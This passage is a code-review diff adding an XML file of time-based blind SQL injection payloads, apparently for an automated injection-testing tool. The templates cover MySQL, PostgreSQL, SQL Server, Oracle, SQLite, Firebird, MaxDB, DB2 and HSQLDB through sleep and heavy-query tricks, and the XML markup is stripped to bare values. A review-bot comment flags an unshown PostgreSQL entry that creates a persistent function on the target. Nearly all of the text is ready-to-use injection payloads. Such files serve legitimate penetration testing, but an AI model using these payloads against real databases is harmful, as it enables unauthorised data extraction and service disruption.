+ ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END
+
+ ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)
+ --
+
+
+
+
+
+ HSQLDB
+ >= 1.7.2
+
+
+
+
+ HSQLDB >= 2.0 stacked queries
+ 4
+ 4
+ 0
+ 0
+ 1
+ ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END
+
+ ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
+ --
+
+
+
+
+
+ HSQLDB
+ >= 2.0
+
+
+
+
+
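Review bot: The `PostgreSQL < 8.2 stacked queries (Glibc)` entry's second payload runs `CREATE OR REPLACE FUNCTION SLEEP(int) ... language 'C' STRICT` on the target, a DDL change that persists after the test, while every other entry in this file only sleeps or burns CPU. Neither the title nor the numeric metadata signals that side effect: its third value is `0`, the same as the sleep-only neighbours, and if that is the stripped `risk` field the entry is selected on the same terms as the harmless ones. I'd surface it in the title, e.g. `PostgreSQL < 8.2 stacked queries (Glibc - creates persistent SLEEP function)`, and give it a higher risk value so an operator has to opt in to leaving an artifact on the tested database.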
diff --git a/xml/payloads/05_time_blind.xml b/xml/payloads/05_time_blind.xml
new file mode 100644
index 000000000..1d3ba16df
--- /dev/null
+++ b/xml/payloads/05_time_blind.xml
@@ -0,0 +1,1574 @@
+
+
+
+
+
+ MySQL > 5.0.11 AND time-based blind (SELECT)
+ 5
+ 1
+ 1
+ 1,2,3
+ 1
+ AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+ AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL > 5.0.11 AND time-based blind (SELECT - comment)
+ 5
+ 4
+ 1
+ 1,2,3
+ 1
+ AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+ AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+ #
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL > 5.0.11 AND time-based blind
+ 5
+ 1
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
+
+ AND SLEEP([SLEEPTIME])
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL > 5.0.11 AND time-based blind (comment)
+ 5
+ 4
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
+
+ AND SLEEP([SLEEPTIME])
+ #
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL < 5.0.12 AND time-based blind (heavy query)
+ 5
+ 2
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
+
+ AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL < 5.0.12 AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
+
+ AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
+ #
+
+
+
+
+
+ MySQL
+
+
+
+
+ PostgreSQL > 8.1 AND time-based blind
+ 5
+ 1
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
+
+
+
+
+
+ PostgreSQL
+ > 8.1
+
+
+
+
+ PostgreSQL > 8.1 AND time-based blind (comment)
+ 5
+ 5
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
+ --
+
+
+
+
+
+ PostgreSQL
+ > 8.1
+
+
+
+
+ PostgreSQL AND time-based blind (heavy query)
+ 5
+ 3
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
+
+
+
+
+
+ PostgreSQL
+
+
+
+
+ PostgreSQL AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
+ --
+
+
+
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase time-based blind
+ 5
+ 1
+ 0
+ 0
+ 1
+ IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
+
+ WAITFOR DELAY '0:0:[SLEEPTIME]'
+ --
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Microsoft SQL Server/Sybase AND time-based blind (heavy query)
+ 5
+ 2
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
+ --
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Oracle AND time-based blind
+ 5
+ 1
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle AND time-based blind (comment)
+ 5
+ 5
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
+ --
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle AND time-based blind (heavy query)
+ 5
+ 2
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
+ --
+
+
+
+
+
+ Oracle
+
+
+
+
+ SQLite > 2.0 AND time-based blind (heavy query)
+ 5
+ 3
+ 2
+ 1
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
+
+
+
+
+
+ SQLite
+ > 2.0
+
+
+
+
+ SQLite > 2.0 AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
+ --
+
+
+
+
+
+ SQLite
+ > 2.0
+
+
+
+
+ Firebird AND time-based blind (heavy query)
+ 5
+ 4
+ 2
+ 1
+ 1
+ AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
+
+
+
+
+
+ Firebird
+ >= 2.0
+
+
+
+
+ Firebird AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1
+ 1
+ AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
+ --
+
+
+
+
+
+ Firebird
+ >= 2.0
+
+
+
+
+ SAP MaxDB AND time-based blind (heavy query)
+ 5
+ 3
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
+
+
+
+
+
+ SAP MaxDB
+
+
+
+
+ SAP MaxDB AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
+ --
+
+
+
+
+
+ SAP MaxDB
+
+
+
+
+ IBM DB2 AND time-based blind (heavy query)
+ 5
+ 3
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
+
+
+
+
+
+ IBM DB2
+
+
+
+
+ IBM DB2 AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
+ --
+
+
+
+
+
+ IBM DB2
+
+
+
+
+ HSQLDB >= 1.7.2 AND time-based blind (heavy query)
+ 5
+ 4
+ 2
+ 1,2,3
+ 1
+ AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END
+
+ AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)
+
+
+
+
+
+ HSQLDB
+ >= 1.7.2
+
+
+
+
+ HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END
+
+ AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)
+ --
+
+
+
+
+
+ HSQLDB
+ >= 1.7.2
+
+
+
+
+ HSQLDB > 2.0 AND time-based blind (heavy query)
+ 5
+ 4
+ 2
+ 1,2,3
+ 1
+ AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END
+
+ AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
+
+
+
+
+
+ HSQLDB
+ > 2.0
+
+
+
+
+ HSQLDB > 2.0 AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END
+
+ AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
+ --
+
+
+
+
+
+ HSQLDB
+ > 2.0
+
+
+
+
+
+
+
+ MySQL > 5.0.11 OR time-based blind (SELECT)
+ 5
+ 1
+ 3
+ 1,2,3
+ 2
+ OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+ OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL > 5.0.11 OR time-based blind (SELECT - comment)
+ 5
+ 4
+ 3
+ 1,2,3
+ 2
+ OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+ OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+ #
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL > 5.0.11 OR time-based blind
+ 5
+ 2
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
+
+ OR [RANDNUM]=SLEEP([SLEEPTIME])
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL < 5.0.12 OR time-based blind (heavy query)
+ 5
+ 4
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
+
+ OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
+
+
+
+
+
+ MySQL
+
+
+
+
+ PostgreSQL > 8.1 OR time-based blind
+ 5
+ 3
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
+
+ OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
+
+
+
+
+
+ PostgreSQL
+ > 8.1
+
+
+
+
+ PostgreSQL OR time-based blind (heavy query)
+ 5
+ 4
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
+
+ OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
+
+
+
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase OR time-based blind (heavy query)
+ 5
+ 3
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
+
+ OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Oracle OR time-based blind
+ 5
+ 3
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
+
+ OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle OR time-based blind (heavy query)
+ 5
+ 4
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)
+
+ OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
+
+
+
+
+
+ Oracle
+
+
+
+
+ SQLite > 2.0 OR time-based blind (heavy query)
+ 5
+ 4
+ 3
+ 1
+ 2
+ OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
+
+ OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
+
+
+
+
+
+ SQLite
+ > 2.0
+
+
+
+
+ Firebird OR time-based blind (heavy query)
+ 5
+ 5
+ 3
+ 1
+ 2
+ OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
+
+ OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
+
+
+
+
+
+ Firebird
+ >= 2.0
+
+
+
+
+ SAP MaxDB OR time-based blind (heavy query - comment)
+ 5
+ 4
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
+
+ OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
+
+
+
+
+
+ SAP MaxDB
+
+
+
+
+ IBM DB2 OR time-based blind (heavy query)
+ 5
+ 4
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
+
+ OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
+
+
+
+
+
+ IBM DB2
+
+
+
+
+ HSQLDB >= 1.7.2 OR time-based blind (heavy query)
+ 5
+ 4
+ 2
+ 1,2,3
+ 1
+ OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END
+
+ OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)
+
+
+
+
+
+ HSQLDB
+ >= 1.7.2
+
+
+
+
+ HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END
+
+ OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)
+ --
+
+
+
+
+
+ HSQLDB
+ >= 1.7.2
+
+
+
+
+ HSQLDB > 2.0 OR time-based blind (heavy query)
+ 5
+ 4
+ 2
+ 1,2,3
+ 1
+ OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END
+
+ OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
+
+
+
+
+
+ HSQLDB
+ > 2.0
+
+
+
+
+ HSQLDB > 2.0 OR time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END
+
+ OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
+ --
+
+
+
+
+
+ HSQLDB
+ > 2.0
+
+
+
+
+
+
+
+ MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
+ 5
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)
+
+ PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+
+
+ MySQL > 5.0.11 time-based blind - Parameter replace (SELECT)
+ 5
+ 4
+ 1
+ 1,2,3
+ 3
+ (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+ (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL > 5.0.11 time-based blind - Parameter replace (SELECT - comment)
+ 5
+ 5
+ 1
+ 1,2,3
+ 3
+ (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+ (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+ #
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL >= 5.0 time-based blind - Parameter replace
+ 5
+ 3
+ 1
+ 1,2,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+
+
+
+
+
+ MySQL
+ >= 5.0
+
+
+
+
+ MySQL < 5.0 time-based blind - Parameter replace (heavy queries)
+ 5
+ 4
+ 2
+ 1,2,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL time-based blind - Parameter replace (bool*int)
+ 5
+ 4
+ 1
+ 1,2,3
+ 3
+ ([INFERENCE])*SLEEP([SLEEPTIME])
+
+ ([RANDNUM]=[RANDNUM])*SLEEP([SLEEPTIME])
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL time-based blind - Parameter replace (MAKE_SET)
+ 5
+ 5
+ 1
+ 1,2,3
+ 3
+ MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))
+
+ MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL time-based blind - Parameter replace (ELT)
+ 5
+ 5
+ 1
+ 1,2,3
+ 3
+ ELT([INFERENCE],SLEEP([SLEEPTIME]))
+
+ ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
+
+
+
+
+
+ MySQL
+
+
+
+
+ PostgreSQL > 8.1 time-based blind - Parameter replace
+ 5
+ 3
+ 1
+ 1,2,3
+ 3
+ (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
+
+ (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
+
+
+
+
+
+ PostgreSQL
+ > 8.1
+
+
+
+
+ PostgreSQL time-based blind - Parameter replace (heavy query)
+ 5
+ 4
+ 2
+ 1,2,3
+ 3
+ (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
+
+ (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
+
+
+
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase time-based blind - Parameter replace
+ 5
+ 3
+ 1
+ 1,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+
+
+
+
+ Microsoft SQL Server
